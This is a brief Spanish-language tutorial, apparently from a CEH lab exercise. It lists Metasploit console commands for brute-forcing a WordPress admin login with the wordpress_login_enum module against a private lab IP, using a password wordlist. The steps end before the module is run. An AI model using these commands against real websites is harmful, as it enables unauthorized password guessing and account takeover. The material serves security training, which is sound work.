METASPLOIT

 

1. Iniciar metasploit
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
2. En PASS_FILE colocamos la direccion de una Wordlist..
set PASS_FILE /home/attacker/Desktop/Wordlist/password.txt
3. En RHOSTS colocamos la IP de la maquina objetivo
set RHOSTS 10.10.1.22
4. En RPORT colocamos el puerto, normalmente es el puerto 8080
set RPORT 8080
5. En TARGETURI colocamos la direccion donde esta alojada la pagina.
set TARGETURI http://10.10.1.22:8080/CEH
6. En USERNAME colocamos el usuarioz.
set USERNAME admin